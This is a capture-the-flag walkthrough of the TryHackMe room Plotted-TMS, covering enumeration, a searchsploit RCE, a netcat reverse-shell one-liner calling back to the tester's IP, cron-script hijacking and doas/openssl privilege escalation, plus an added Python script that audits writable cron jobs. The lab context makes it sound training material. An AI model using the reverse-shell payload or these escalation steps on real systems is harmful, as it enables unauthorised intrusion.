
Plotted-TMS TryHackMe

Let’s take a look at the Plotted-TMS CTF on TryHackMe, created by @sa.infinity8888.

Enumeration

Nmap Scan

The first step of my enumeration was a scan with nmap, using the command:

sudo nmap 10.10.123.136 -sC -sS -Pn

The Nmap output showed three services running, on ports 80, 445 and 22.

Dirsearch Scan

I next ran a Dirsearch scan against the web server to see if there were any interesting hidden directories.

After the scan completed, we saw an id_rsa file, and with the help of CyberChef we found:

Trust me it is not this easy..now get back to enumeration :D

We also found a passwd file, which read:

not this easy :D

Next I ran the same scan against the web server on port 445.

This revealed a landing page and a login page.

Exploiting

Now let’s look for exploits that we can use.

searchsploit Traffic Offence Management System

The Searchsploit output listed RCE (Remote Code Execution), SQLi (SQL Injection) and XSS (Cross-site Scripting) exploits. I decided to go with the RCE vulnerability.

I modified the exploit as needed.

It successfully achieved RCE and uploaded a shell to the host.

I tested it by running the ls command.

Reverse Shell

I set up a netcat listener on port 4444, fired up Burp and sent a POST request with the following payload, URL-encoded:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.174.180 4444 >/tmp/f

Great! I received a reverse connection on port 4444 and upgraded the shell.

Database Discovery

Now that we're on the machine, I took a look at the initialize.php file, which gave me the username and password for accessing the database.

I then connected to the database using those credentials and found some password hashes.

User Flag

Inside the home directory of the plot_admin user, I noticed a file called user.txt, but I didn't have the rights to read it (permission denied).

As I was exploring, I took a look at the crontab file.

Interestingly, it ran a script called backup.

I then removed the original backup script and replaced it with one that gives me a reverse shell, generated with reverse-shell-generator.

After checking the time with the date command, I got a shell on my listener and grabbed the user flag.
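The escalation above works because the cron job's script could be rewritten by a user other than the job's owner. As an added example (not part of the original write-up), here is a small audit that parses a system crontab and flags jobs whose script is group/world-writable or owned by someone other than the job's user; the crontab text, script path and the helper names parse_crontab, find_writable_jobs and demo are constructed for this demonstration.

```python
import os
import re
import stat
import tempfile

# System crontab layout: minute hour dom month dow user command
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_crontab(text):
    """Yield (user, script_path) for each job line of a system crontab."""
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and environment assignments such as PATH=...
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            # The first token of the command is the script/binary being executed
            yield m.group("user"), m.group("cmd").split()[0]


def find_writable_jobs(text, uid_of):
    """Return (user, path) for jobs whose script a non-owner could rewrite.

    uid_of maps a crontab user name to its uid (e.g. pwd.getpwnam(u).pw_uid).
    """
    findings = []
    for user, path in parse_crontab(text):
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        group_or_world_writable = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
        owned_by_someone_else = st.st_uid != uid_of(user)
        if group_or_world_writable or owned_by_someone_else:
            findings.append((user, path))
    return findings


def demo():
    """Constructed scenario: a root cron job running a world-writable backup script."""
    script = os.path.join(tempfile.mkdtemp(), "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n")
    crontab = f"PATH=/usr/bin:/bin\n# constructed entry\n* * * * * root {script}\n"
    os.chmod(script, 0o777)  # weak: any local user can replace the job's script
    weak = find_writable_jobs(crontab, lambda user: 0)
    os.chmod(script, 0o755)  # hardened: only the owner may write
    fixed = find_writable_jobs(crontab, lambda user: os.getuid())
    return weak, fixed
```

On a real host, feed it the contents of /etc/crontab and /etc/cron.d/* with uid_of backed by the pwd module.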

Root Flag

Now it’s time to escalate our privileges and get the root flag.

The result of find / -perm -u=s -type f 2>/dev/null showed that we can run doas as root. After some research I found that it only let me run openssl with root privileges, so I followed the GTFOBins steps for openssl.

Thanks for reading!!!

Reda BELHAJ
